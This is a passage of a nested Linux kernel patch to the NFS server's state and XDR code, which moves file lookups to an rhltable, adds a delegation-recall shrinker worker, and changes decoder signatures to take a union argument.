+-	int mem, i;
++	int i;
+ 
+-	BUILD_BUG_ON(NFSD_MAX_SLOTS_PER_SESSION * sizeof(struct nfsd4_slot *)
+-			+ sizeof(struct nfsd4_session) > PAGE_SIZE);
+-	mem = numslots * sizeof(struct nfsd4_slot *);
++	BUILD_BUG_ON(struct_size(new, se_slots, NFSD_MAX_SLOTS_PER_SESSION)
++		     > PAGE_SIZE);
+ 
+-	new = kzalloc(sizeof(*new) + mem, GFP_KERNEL);
++	new = kzalloc(struct_size(new, se_slots, numslots), GFP_KERNEL);
+ 	if (!new)
+ 		return NULL;
+ 	/* allocate each struct nfsd4_slot and data cache in one piece */
+@@ -2143,6 +2145,7 @@ static void __free_client(struct kref *k)
+ 	kfree(clp->cl_nii_domain.data);
+ 	kfree(clp->cl_nii_name.data);
+ 	idr_destroy(&clp->cl_stateids);
++	kfree(clp->cl_ra);
+ 	kmem_cache_free(client_slab, clp);
+ }
+ 
+@@ -2870,6 +2873,37 @@ static const struct tree_descr client_files[] = {
+ 	[3] = {""},
+ };
+ 
++static int
++nfsd4_cb_recall_any_done(struct nfsd4_callback *cb,
++				struct rpc_task *task)
++{
++	trace_nfsd_cb_recall_any_done(cb, task);
++	switch (task->tk_status) {
++	case -NFS4ERR_DELAY:
++		rpc_delay(task, 2 * HZ);
++		return 0;
++	default:
++		return 1;
++	}
++}
++
++static void
++nfsd4_cb_recall_any_release(struct nfsd4_callback *cb)
++{
++	struct nfs4_client *clp = cb->cb_clp;
++	struct nfsd_net *nn = net_generic(clp->net, nfsd_net_id);
++
++	spin_lock(&nn->client_lock);
++	clear_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags);
++	put_client_renew_locked(clp);
++	spin_unlock(&nn->client_lock);
++}
++
++static const struct nfsd4_callback_ops nfsd4_cb_recall_any_ops = {
++	.done		= nfsd4_cb_recall_any_done,
++	.release	= nfsd4_cb_recall_any_release,
++};
++
+ static struct nfs4_client *create_client(struct xdr_netobj name,
+ 		struct svc_rqst *rqstp, nfs4_verifier *verf)
+ {
+@@ -2907,6 +2941,14 @@ static struct nfs4_client *create_client(struct xdr_netobj name,
+ 		free_client(clp);
+ 		return NULL;
+ 	}
++	clp->cl_ra = kzalloc(sizeof(*clp->cl_ra), GFP_KERNEL);
++	if (!clp->cl_ra) {
++		free_client(clp);
++		return NULL;
++	}
++	clp->cl_ra_time = 0;
++	nfsd4_init_cb(&clp->cl_ra->ra_cb, clp, &nfsd4_cb_recall_any_ops,
++			NFSPROC4_CLNT_CB_RECALL_ANY);
+ 	return clp;
+ }
+ 
+@@ -4276,11 +4318,9 @@ static struct nfs4_file *nfsd4_alloc_file(void)
+ }
+ 
+ /* OPEN Share state helper functions */
+-static void nfsd4_init_file(struct svc_fh *fh, unsigned int hashval,
+-				struct nfs4_file *fp)
+-{
+-	lockdep_assert_held(&state_lock);
+ 
++static void nfsd4_file_init(const struct svc_fh *fh, struct nfs4_file *fp)
++{
+ 	refcount_set(&fp->fi_ref, 1);
+ 	spin_lock_init(&fp->fi_lock);
+ 	INIT_LIST_HEAD(&fp->fi_stateids);
+@@ -4298,7 +4338,6 @@ static void nfsd4_init_file(struct svc_fh *fh, unsigned int hashval,
+ 	INIT_LIST_HEAD(&fp->fi_lo_states);
+ 	atomic_set(&fp->fi_lo_recalls, 0);
+ #endif
+-	hlist_add_head_rcu(&fp->fi_hash, &file_hashtbl[hashval]);
+ }
+ 
+ void
+@@ -4363,25 +4402,27 @@ nfsd4_init_slabs(void)
+ }
+ 
+ static unsigned long
+-nfsd_courtesy_client_count(struct shrinker *shrink, struct shrink_control *sc)
++nfsd4_state_shrinker_count(struct shrinker *shrink, struct shrink_control *sc)
+ {
+-	int cnt;
++	int count;
+ 	struct nfsd_net *nn = container_of(shrink,
+ 			struct nfsd_net, nfsd_client_shrinker);
+ 
+-	cnt = atomic_read(&nn->nfsd_courtesy_clients);
+-	if (cnt > 0)
+-		mod_delayed_work(laundry_wq, &nn->nfsd_shrinker_work, 0);
+-	return (unsigned long)cnt;
++	count = atomic_read(&nn->nfsd_courtesy_clients);
++	if (!count)
++		count = atomic_long_read(&num_delegations);
++	if (count)
++		queue_work(laundry_wq, &nn->nfsd_shrinker_work);
++	return (unsigned long)count;
+ }
+ 
+ static unsigned long
+-nfsd_courtesy_client_scan(struct shrinker *shrink, struct shrink_control *sc)
++nfsd4_state_shrinker_scan(struct shrinker *shrink, struct shrink_control *sc)
+ {
+ 	return SHRINK_STOP;
+ }
+ 
+-int
++void
+ nfsd4_init_leases_net(struct nfsd_net *nn)
+ {
+ 	struct sysinfo si;
+@@ -4403,16 +4444,6 @@ nfsd4_init_leases_net(struct nfsd_net *nn)
+ 	nn->nfs4_max_clients = max_t(int, max_clients, NFS4_CLIENTS_PER_GB);
+ 
+ 	atomic_set(&nn->nfsd_courtesy_clients, 0);
+-	nn->nfsd_client_shrinker.scan_objects = nfsd_courtesy_client_scan;
+-	nn->nfsd_client_shrinker.count_objects = nfsd_courtesy_client_count;
+-	nn->nfsd_client_shrinker.seeks = DEFAULT_SEEKS;
+-	return register_shrinker(&nn->nfsd_client_shrinker, "nfsd-client");
+-}
+-
+-void
+-nfsd4_leases_net_shutdown(struct nfsd_net *nn)
+-{
+-	unregister_shrinker(&nn->nfsd_client_shrinker);
+ }
+ 
+ static void init_nfs4_replay(struct nfs4_replay *rp)
+@@ -4683,71 +4714,80 @@ move_to_close_lru(struct nfs4_ol_stateid *s, struct net *net)
+ 		nfs4_put_stid(&last->st_stid);
+ }
+ 
+-/* search file_hashtbl[] for file */
+-static struct nfs4_file *
+-find_file_locked(struct svc_fh *fh, unsigned int hashval)
++static noinline_for_stack struct nfs4_file *
++nfsd4_file_hash_lookup(const struct svc_fh *fhp)
+ {
+-	struct nfs4_file *fp;
++	struct inode *inode = d_inode(fhp->fh_dentry);
++	struct rhlist_head *tmp, *list;
++	struct nfs4_file *fi;
+ 
+-	hlist_for_each_entry_rcu(fp, &file_hashtbl[hashval], fi_hash,
+-				lockdep_is_held(&state_lock)) {
+-		if (fh_match(&fp->fi_fhandle, &fh->fh_handle)) {
+-			if (refcount_inc_not_zero(&fp->fi_ref))
+-				return fp;
++	rcu_read_lock();
++	list = rhltable_lookup(&nfs4_file_rhltable, &inode,
++			       nfs4_file_rhash_params);
++	rhl_for_each_entry_rcu(fi, tmp, list, fi_rlist) {
++		if (fh_match(&fi->fi_fhandle, &fhp->fh_handle)) {
++			if (refcount_inc_not_zero(&fi->fi_ref)) {
++				rcu_read_unlock();
++				return fi;
++			}
+ 		}
+ 	}
++	rcu_read_unlock();
+ 	return NULL;
+ }
+ 
+-static struct nfs4_file *insert_file(struct nfs4_file *new, struct svc_fh *fh,
+-				     unsigned int hashval)
++/*
++ * On hash insertion, identify entries with the same inode but
++ * distinct filehandles. They will all be on the list returned
++ * by rhltable_lookup().
++ *
++ * inode->i_lock prevents racing insertions from adding an entry
++ * for the same inode/fhp pair twice.
++ */
++static noinline_for_stack struct nfs4_file *
++nfsd4_file_hash_insert(struct nfs4_file *new, const struct svc_fh *fhp)
+ {
+-	struct nfs4_file *fp;
++	struct inode *inode = d_inode(fhp->fh_dentry);
++	struct rhlist_head *tmp, *list;
+ 	struct nfs4_file *ret = NULL;
+ 	bool alias_found = false;
++	struct nfs4_file *fi;
++	int err;
+ 
+-	spin_lock(&state_lock);
+-	hlist_for_each_entry_rcu(fp, &file_hashtbl[hashval], fi_hash,
+-				 lockdep_is_held(&state_lock)) {
+-		if (fh_match(&fp->fi_fhandle, &fh->fh_handle)) {
+-			if (refcount_inc_not_zero(&fp->fi_ref))
+-				ret = fp;
+-		} else if (d_inode(fh->fh_dentry) == fp->fi_inode)
+-			fp->fi_aliased = alias_found = true;
+-	}
+-	if (likely(ret == NULL)) {
+-		nfsd4_init_file(fh, hashval, new);
+-		new->fi_aliased = alias_found;
+-		ret = new;
++	rcu_read_lock();
++	spin_lock(&inode->i_lock);
++
++	list = rhltable_lookup(&nfs4_file_rhltable, &inode,
++			       nfs4_file_rhash_params);
++	rhl_for_each_entry_rcu(fi, tmp, list, fi_rlist) {
++		if (fh_match(&fi->fi_fhandle, &fhp->fh_handle)) {
++			if (refcount_inc_not_zero(&fi->fi_ref))
++				ret = fi;
++		} else
++			fi->fi_aliased = alias_found = true;
+ 	}
+-	spin_unlock(&state_lock);
+-	return ret;
+-}
++	if (ret)
++		goto out_unlock;
+ 
+-static struct nfs4_file * find_file(struct svc_fh *fh)
+-{
+-	struct nfs4_file *fp;
+-	unsigned int hashval = file_hashval(fh);
++	nfsd4_file_init(fhp, new);
++	err = rhltable_insert(&nfs4_file_rhltable, &new->fi_rlist,
++			      nfs4_file_rhash_params);
++	if (err)
++		goto out_unlock;
+ 
+-	rcu_read_lock();
+-	fp = find_file_locked(fh, hashval);
++	new->fi_aliased = alias_found;
++	ret = new;
++
++out_unlock:
++	spin_unlock(&inode->i_lock);
+ 	rcu_read_unlock();
+-	return fp;
++	return ret;
+ }
+ 
+-static struct nfs4_file *
+-find_or_add_file(struct nfs4_file *new, struct svc_fh *fh)
++static noinline_for_stack void nfsd4_file_hash_remove(struct nfs4_file *fi)
+ {
+-	struct nfs4_file *fp;
+-	unsigned int hashval = file_hashval(fh);
+-
+-	rcu_read_lock();
+-	fp = find_file_locked(fh, hashval);
+-	rcu_read_unlock();
+-	if (fp)
+-		return fp;
+-
+-	return insert_file(new, fh, hashval);
++	rhltable_remove(&nfs4_file_rhltable, &fi->fi_rlist,
++			nfs4_file_rhash_params);
+ }
+ 
+ /*
+@@ -4760,9 +4800,10 @@ nfs4_share_conflict(struct svc_fh *current_fh, unsigned int deny_type)
+ 	struct nfs4_file *fp;
+ 	__be32 ret = nfs_ok;
+ 
+-	fp = find_file(current_fh);
++	fp = nfsd4_file_hash_lookup(current_fh);
+ 	if (!fp)
+ 		return ret;
++
+ 	/* Check for conflicting share reservations */
+ 	spin_lock(&fp->fi_lock);
+ 	if (fp->fi_share_deny & deny_type)
+@@ -4774,7 +4815,7 @@ nfs4_share_conflict(struct svc_fh *current_fh, unsigned int deny_type)
+ 
+ static bool nfsd4_deleg_present(const struct inode *inode)
+ {
+-	struct file_lock_context *ctx = smp_load_acquire(&inode->i_flctx);
++	struct file_lock_context *ctx = locks_inode_context(inode);
+ 
+ 	return ctx && !list_empty_careful(&ctx->flc_lease);
+ }
+@@ -5655,7 +5696,9 @@ nfsd4_process_open2(struct svc_rqst *rqstp, struct svc_fh *current_fh, struct nf
+ 	 * and check for delegations in the process of being recalled.
+ 	 * If not found, create the nfs4_file struct
+ 	 */
+-	fp = find_or_add_file(open->op_file, current_fh);
++	fp = nfsd4_file_hash_insert(open->op_file, current_fh);
++	if (unlikely(!fp))
++		return nfserr_jukebox;
+ 	if (fp != open->op_file) {
+ 		status = nfs4_check_deleg(cl, open, &dp);
+ 		if (status)
+@@ -5932,7 +5975,7 @@ nfs4_lockowner_has_blockers(struct nfs4_lockowner *lo)
+ 
+ 	list_for_each_entry(stp, &lo->lo_owner.so_stateids, st_perstateowner) {
+ 		nf = stp->st_stid.sc_file;
+-		ctx = nf->fi_inode->i_flctx;
++		ctx = locks_inode_context(nf->fi_inode);
+ 		if (!ctx)
+ 			continue;
+ 		if (locks_owner_has_blockers(ctx, lo))
+@@ -6160,17 +6203,63 @@ laundromat_main(struct work_struct *laundry)
+ }
+ 
+ static void
+-courtesy_client_reaper(struct work_struct *reaper)
++courtesy_client_reaper(struct nfsd_net *nn)
+ {
+ 	struct list_head reaplist;
+-	struct delayed_work *dwork = to_delayed_work(reaper);
+-	struct nfsd_net *nn = container_of(dwork, struct nfsd_net,
+-					nfsd_shrinker_work);
+ 
+ 	nfs4_get_courtesy_client_reaplist(nn, &reaplist);
+ 	nfs4_process_client_reaplist(&reaplist);
+ }
+ 
++static void
++deleg_reaper(struct nfsd_net *nn)
++{
++	struct list_head *pos, *next;
++	struct nfs4_client *clp;
++	struct list_head cblist;
++
++	INIT_LIST_HEAD(&cblist);
++	spin_lock(&nn->client_lock);
++	list_for_each_safe(pos, next, &nn->client_lru) {
++		clp = list_entry(pos, struct nfs4_client, cl_lru);
++		if (clp->cl_state != NFSD4_ACTIVE ||
++			list_empty(&clp->cl_delegations) ||
++			atomic_read(&clp->cl_delegs_in_recall) ||
++			test_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags) ||
++			(ktime_get_boottime_seconds() -
++				clp->cl_ra_time < 5)) {
++			continue;
++		}
++		list_add(&clp->cl_ra_cblist, &cblist);
++
++		/* release in nfsd4_cb_recall_any_release */
++		atomic_inc(&clp->cl_rpc_users);
++		set_bit(NFSD4_CLIENT_CB_RECALL_ANY, &clp->cl_flags);
++		clp->cl_ra_time = ktime_get_boottime_seconds();
++	}
++	spin_unlock(&nn->client_lock);
++
++	while (!list_empty(&cblist)) {
++		clp = list_first_entry(&cblist, struct nfs4_client,
++					cl_ra_cblist);
++		list_del_init(&clp->cl_ra_cblist);
++		clp->cl_ra->ra_keep = 0;
++		clp->cl_ra->ra_bmval[0] = BIT(RCA4_TYPE_MASK_RDATA_DLG);
++		trace_nfsd_cb_recall_any(clp->cl_ra);
++		nfsd4_run_cb(&clp->cl_ra->ra_cb);
++	}
++}
++
++static void
++nfsd4_state_shrinker_worker(struct work_struct *work)
++{
++	struct nfsd_net *nn = container_of(work, struct nfsd_net,
++				nfsd_shrinker_work);
++
++	courtesy_client_reaper(nn);
++	deleg_reaper(nn);
++}
++
+ static inline __be32 nfs4_check_fh(struct svc_fh *fhp, struct nfs4_stid *stp)
+ {
+ 	if (!fh_match(&fhp->fh_handle, &stp->sc_file->fi_fhandle))
+@@ -6935,6 +7024,7 @@ nfsd4_delegreturn(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	if (status)
+ 		goto put_stateid;
+ 
++	trace_nfsd_deleg_return(stateid);
+ 	wake_up_var(d_inode(cstate->current_fh.fh_dentry));
+ 	destroy_delegation(dp);
+ put_stateid:
+@@ -7748,7 +7838,7 @@ check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+ 	}
+ 
+ 	inode = locks_inode(nf->nf_file);
+-	flctx = inode->i_flctx;
++	flctx = locks_inode_context(inode);
+ 
+ 	if (flctx && !list_empty_careful(&flctx->flc_posix)) {
+ 		spin_lock(&flctx->flc_lock);
+@@ -7995,11 +8085,20 @@ static int nfs4_state_create_net(struct net *net)
+ 	INIT_LIST_HEAD(&nn->blocked_locks_lru);
+ 
+ 	INIT_DELAYED_WORK(&nn->laundromat_work, laundromat_main);
+-	INIT_DELAYED_WORK(&nn->nfsd_shrinker_work, courtesy_client_reaper);
++	INIT_WORK(&nn->nfsd_shrinker_work, nfsd4_state_shrinker_worker);
+ 	get_net(net);
+ 
++	nn->nfsd_client_shrinker.scan_objects = nfsd4_state_shrinker_scan;
++	nn->nfsd_client_shrinker.count_objects = nfsd4_state_shrinker_count;
++	nn->nfsd_client_shrinker.seeks = DEFAULT_SEEKS;
++
++	if (register_shrinker(&nn->nfsd_client_shrinker, "nfsd-client"))
++		goto err_shrinker;
+ 	return 0;
+ 
++err_shrinker:
++	put_net(net);
++	kfree(nn->sessionid_hashtbl);
+ err_sessionid:
+ 	kfree(nn->unconf_id_hashtbl);
+ err_unconf_id:
+@@ -8071,10 +8170,16 @@ nfs4_state_start(void)
+ {
+ 	int ret;
+ 
+-	ret = nfsd4_create_callback_queue();
++	ret = rhltable_init(&nfs4_file_rhltable, &nfs4_file_rhash_params);
+ 	if (ret)
+ 		return ret;
+ 
++	ret = nfsd4_create_callback_queue();
++	if (ret) {
++		rhltable_destroy(&nfs4_file_rhltable);
++		return ret;
++	}
++
+ 	set_max_delegations();
+ 	return 0;
+ }
+@@ -8086,6 +8191,8 @@ nfs4_state_shutdown_net(struct net *net)
+ 	struct list_head *pos, *next, reaplist;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
++	unregister_shrinker(&nn->nfsd_client_shrinker);
++	cancel_work(&nn->nfsd_shrinker_work);
+ 	cancel_delayed_work_sync(&nn->laundromat_work);
+ 	locks_end_grace(&nn->nfsd4_manager);
+ 
+@@ -8114,6 +8221,7 @@ void
+ nfs4_state_shutdown(void)
+ {
+ 	nfsd4_destroy_callback_queue();
++	rhltable_destroy(&nfs4_file_rhltable);
+ }
+ 
+ static void
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 89a579be042e5..597f14a80512f 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -770,16 +770,18 @@ nfsd4_decode_cb_sec(struct nfsd4_compoundargs *argp, struct nfsd4_cb_sec *cbs)
+ 
+ static __be32
+ nfsd4_decode_access(struct nfsd4_compoundargs *argp,
+-		    struct nfsd4_access *access)
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_access *access = &u->access;
+ 	if (xdr_stream_decode_u32(argp->xdr, &access->ac_req_access) < 0)
+ 		return nfserr_bad_xdr;
+ 	return nfs_ok;
+ }
+ 
+ static __be32
+-nfsd4_decode_close(struct nfsd4_compoundargs *argp, struct nfsd4_close *close)
++nfsd4_decode_close(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_close *close = &u->close;
+ 	if (xdr_stream_decode_u32(argp->xdr, &close->cl_seqid) < 0)
+ 		return nfserr_bad_xdr;
+ 	return nfsd4_decode_stateid4(argp, &close->cl_stateid);
+@@ -787,8 +789,9 @@ nfsd4_decode_close(struct nfsd4_compoundargs *argp, struct nfsd4_close *close)
+ 
+ 
+ static __be32
+-nfsd4_decode_commit(struct nfsd4_compoundargs *argp, struct nfsd4_commit *commit)
++nfsd4_decode_commit(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_commit *commit = &u->commit;
+ 	if (xdr_stream_decode_u64(argp->xdr, &commit->co_offset) < 0)
+ 		return nfserr_bad_xdr;
+ 	if (xdr_stream_decode_u32(argp->xdr, &commit->co_count) < 0)
+@@ -798,8 +801,9 @@ nfsd4_decode_commit(struct nfsd4_compoundargs *argp, struct nfsd4_commit *commit
+ }
+ 
+ static __be32
+-nfsd4_decode_create(struct nfsd4_compoundargs *argp, struct nfsd4_create *create)
++nfsd4_decode_create(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_create *create = &u->create;
+ 	__be32 *p, status;
+ 
+ 	memset(create, 0, sizeof(*create));
+@@ -844,22 +848,25 @@ nfsd4_decode_create(struct nfsd4_compoundargs *argp, struct nfsd4_create *create
+ }
+ 
+ static inline __be32
+-nfsd4_decode_delegreturn(struct nfsd4_compoundargs *argp, struct nfsd4_delegreturn *dr)
++nfsd4_decode_delegreturn(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_delegreturn *dr = &u->delegreturn;
+ 	return nfsd4_decode_stateid4(argp, &dr->dr_stateid);
+ }
+ 
+ static inline __be32
+-nfsd4_decode_getattr(struct nfsd4_compoundargs *argp, struct nfsd4_getattr *getattr)
++nfsd4_decode_getattr(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_getattr *getattr = &u->getattr;
+ 	memset(getattr, 0, sizeof(*getattr));
+ 	return nfsd4_decode_bitmap4(argp, getattr->ga_bmval,
+ 				    ARRAY_SIZE(getattr->ga_bmval));
+ }
+ 
+ static __be32
+-nfsd4_decode_link(struct nfsd4_compoundargs *argp, struct nfsd4_link *link)
++nfsd4_decode_link(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_link *link = &u->link;
+ 	memset(link, 0, sizeof(*link));
+ 	return nfsd4_decode_component4(argp, &link->li_name, &link->li_namelen);
+ }
+@@ -907,8 +914,9 @@ nfsd4_decode_locker4(struct nfsd4_compoundargs *argp, struct nfsd4_lock *lock)
+ }
+ 
+ static __be32
+-nfsd4_decode_lock(struct nfsd4_compoundargs *argp, struct nfsd4_lock *lock)
++nfsd4_decode_lock(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_lock *lock = &u->lock;
+ 	memset(lock, 0, sizeof(*lock));
+ 	if (xdr_stream_decode_u32(argp->xdr, &lock->lk_type) < 0)
+ 		return nfserr_bad_xdr;
+@@ -924,8 +932,9 @@ nfsd4_decode_lock(struct nfsd4_compoundargs *argp, struct nfsd4_lock *lock)
+ }
+ 
+ static __be32
+-nfsd4_decode_lockt(struct nfsd4_compoundargs *argp, struct nfsd4_lockt *lockt)
++nfsd4_decode_lockt(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_lockt *lockt = &u->lockt;
+ 	memset(lockt, 0, sizeof(*lockt));
+ 	if (xdr_stream_decode_u32(argp->xdr, &lockt->lt_type) < 0)
+ 		return nfserr_bad_xdr;
+@@ -940,8 +949,9 @@ nfsd4_decode_lockt(struct nfsd4_compoundargs *argp, struct nfsd4_lockt *lockt)
+ }
+ 
+ static __be32
+-nfsd4_decode_locku(struct nfsd4_compoundargs *argp, struct nfsd4_locku *locku)
++nfsd4_decode_locku(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_locku *locku = &u->locku;
+ 	__be32 status;
+ 
+ 	if (xdr_stream_decode_u32(argp->xdr, &locku->lu_type) < 0)
+@@ -962,8 +972,9 @@ nfsd4_decode_locku(struct nfsd4_compoundargs *argp, struct nfsd4_locku *locku)
+ }
+ 
+ static __be32
+-nfsd4_decode_lookup(struct nfsd4_compoundargs *argp, struct nfsd4_lookup *lookup)
++nfsd4_decode_lookup(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_lookup *lookup = &u->lookup;
+ 	return nfsd4_decode_component4(argp, &lookup->lo_name, &lookup->lo_len);
+ }
+ 
+@@ -1143,8 +1154,9 @@ nfsd4_decode_open_claim4(struct nfsd4_compoundargs *argp,
+ }
+ 
+ static __be32
+-nfsd4_decode_open(struct nfsd4_compoundargs *argp, struct nfsd4_open *open)
++nfsd4_decode_open(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_open *open = &u->open;
+ 	__be32 status;
+ 	u32 dummy;
+ 
+@@ -1171,8 +1183,10 @@ nfsd4_decode_open(struct nfsd4_compoundargs *argp, struct nfsd4_open *open)
+ }
+ 
+ static __be32
+-nfsd4_decode_open_confirm(struct nfsd4_compoundargs *argp, struct nfsd4_open_confirm *open_conf)
++nfsd4_decode_open_confirm(struct nfsd4_compoundargs *argp,
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_open_confirm *open_conf = &u->open_confirm;
+ 	__be32 status;
+ 
+ 	if (argp->minorversion >= 1)
+@@ -1190,8 +1204,10 @@ nfsd4_decode_open_confirm(struct nfsd4_compoundargs *argp, struct nfsd4_open_con
+ }
+ 
+ static __be32
+-nfsd4_decode_open_downgrade(struct nfsd4_compoundargs *argp, struct nfsd4_open_downgrade *open_down)
++nfsd4_decode_open_downgrade(struct nfsd4_compoundargs *argp,
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_open_downgrade *open_down = &u->open_downgrade;
+ 	__be32 status;
+ 
+ 	memset(open_down, 0, sizeof(*open_down));
+@@ -1209,8 +1225,9 @@ nfsd4_decode_open_downgrade(struct nfsd4_compoundargs *argp, struct nfsd4_open_d
+ }
+ 
+ static __be32
+-nfsd4_decode_putfh(struct nfsd4_compoundargs *argp, struct nfsd4_putfh *putfh)
++nfsd4_decode_putfh(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_putfh *putfh = &u->putfh;
+ 	__be32 *p;
+ 
+ 	if (xdr_stream_decode_u32(argp->xdr, &putfh->pf_fhlen) < 0)
+@@ -1229,7 +1246,7 @@ nfsd4_decode_putfh(struct nfsd4_compoundargs *argp, struct nfsd4_putfh *putfh)
+ }
+ 
+ static __be32
+-nfsd4_decode_putpubfh(struct nfsd4_compoundargs *argp, void *p)
++nfsd4_decode_putpubfh(struct nfsd4_compoundargs *argp, union nfsd4_op_u *p)
+ {
+ 	if (argp->minorversion == 0)
+ 		return nfs_ok;
+@@ -1237,8 +1254,9 @@ nfsd4_decode_putpubfh(struct nfsd4_compoundargs *argp, void *p)
+ }
+ 
+ static __be32
+-nfsd4_decode_read(struct nfsd4_compoundargs *argp, struct nfsd4_read *read)
++nfsd4_decode_read(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_read *read = &u->read;
+ 	__be32 status;
+ 
+ 	memset(read, 0, sizeof(*read));
+@@ -1254,8 +1272,9 @@ nfsd4_decode_read(struct nfsd4_compoundargs *argp, struct nfsd4_read *read)
+ }
+ 
+ static __be32
+-nfsd4_decode_readdir(struct nfsd4_compoundargs *argp, struct nfsd4_readdir *readdir)
++nfsd4_decode_readdir(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_readdir *readdir = &u->readdir;
+ 	__be32 status;
+ 
+ 	memset(readdir, 0, sizeof(*readdir));
+@@ -1276,15 +1295,17 @@ nfsd4_decode_readdir(struct nfsd4_compoundargs *argp, struct nfsd4_readdir *read
+ }
+ 
+ static __be32
+-nfsd4_decode_remove(struct nfsd4_compoundargs *argp, struct nfsd4_remove *remove)
++nfsd4_decode_remove(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_remove *remove = &u->remove;
+ 	memset(&remove->rm_cinfo, 0, sizeof(remove->rm_cinfo));
+ 	return nfsd4_decode_component4(argp, &remove->rm_name, &remove->rm_namelen);
+ }
+ 
+ static __be32
+-nfsd4_decode_rename(struct nfsd4_compoundargs *argp, struct nfsd4_rename *rename)
++nfsd4_decode_rename(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_rename *rename = &u->rename;
+ 	__be32 status;
+ 
+ 	memset(rename, 0, sizeof(*rename));
+@@ -1295,22 +1316,25 @@ nfsd4_decode_rename(struct nfsd4_compoundargs *argp, struct nfsd4_rename *rename
+ }
+ 
+ static __be32
+-nfsd4_decode_renew(struct nfsd4_compoundargs *argp, clientid_t *clientid)
++nfsd4_decode_renew(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	clientid_t *clientid = &u->renew;
+ 	return nfsd4_decode_clientid4(argp, clientid);
+ }
+ 
+ static __be32
+ nfsd4_decode_secinfo(struct nfsd4_compoundargs *argp,
+-		     struct nfsd4_secinfo *secinfo)
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_secinfo *secinfo = &u->secinfo;
+ 	secinfo->si_exp = NULL;
+ 	return nfsd4_decode_component4(argp, &secinfo->si_name, &secinfo->si_namelen);
+ }
+ 
+ static __be32
+-nfsd4_decode_setattr(struct nfsd4_compoundargs *argp, struct nfsd4_setattr *setattr)
++nfsd4_decode_setattr(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_setattr *setattr = &u->setattr;
+ 	__be32 status;
+ 
+ 	memset(setattr, 0, sizeof(*setattr));
+@@ -1324,8 +1348,9 @@ nfsd4_decode_setattr(struct nfsd4_compoundargs *argp, struct nfsd4_setattr *seta
+ }
+ 
+ static __be32
+-nfsd4_decode_setclientid(struct nfsd4_compoundargs *argp, struct nfsd4_setclientid *setclientid)
++nfsd4_decode_setclientid(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_setclientid *setclientid = &u->setclientid;
+ 	__be32 *p, status;
+ 
+ 	memset(setclientid, 0, sizeof(*setclientid));
+@@ -1367,8 +1392,10 @@ nfsd4_decode_setclientid(struct nfsd4_compoundargs *argp, struct nfsd4_setclient
+ }
+ 
+ static __be32
+-nfsd4_decode_setclientid_confirm(struct nfsd4_compoundargs *argp, struct nfsd4_setclientid_confirm *scd_c)
++nfsd4_decode_setclientid_confirm(struct nfsd4_compoundargs *argp,
++				 union nfsd4_op_u *u)
+ {
++	struct nfsd4_setclientid_confirm *scd_c = &u->setclientid_confirm;
+ 	__be32 status;
+ 
+ 	if (argp->minorversion >= 1)
+@@ -1382,8 +1409,9 @@ nfsd4_decode_setclientid_confirm(struct nfsd4_compoundargs *argp, struct nfsd4_s
+ 
+ /* Also used for NVERIFY */
+ static __be32
+-nfsd4_decode_verify(struct nfsd4_compoundargs *argp, struct nfsd4_verify *verify)
++nfsd4_decode_verify(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_verify *verify = &u->verify;
+ 	__be32 *p, status;
+ 
+ 	memset(verify, 0, sizeof(*verify));
+@@ -1409,8 +1437,9 @@ nfsd4_decode_verify(struct nfsd4_compoundargs *argp, struct nfsd4_verify *verify
+ }
+ 
+ static __be32
+-nfsd4_decode_write(struct nfsd4_compoundargs *argp, struct nfsd4_write *write)
++nfsd4_decode_write(struct nfsd4_compoundargs *argp, union nfsd4_op_u *u)
+ {
++	struct nfsd4_write *write = &u->write;
+ 	__be32 status;
+ 
+ 	status = nfsd4_decode_stateid4(argp, &write->wr_stateid);
+@@ -1434,8 +1463,10 @@ nfsd4_decode_write(struct nfsd4_compoundargs *argp, struct nfsd4_write *write)
+ }
+ 
+ static __be32
+-nfsd4_decode_release_lockowner(struct nfsd4_compoundargs *argp, struct nfsd4_release_lockowner *rlockowner)
++nfsd4_decode_release_lockowner(struct nfsd4_compoundargs *argp,
++			       union nfsd4_op_u *u)
+ {
++	struct nfsd4_release_lockowner *rlockowner = &u->release_lockowner;
+ 	__be32 status;
+ 
+ 	if (argp->minorversion >= 1)
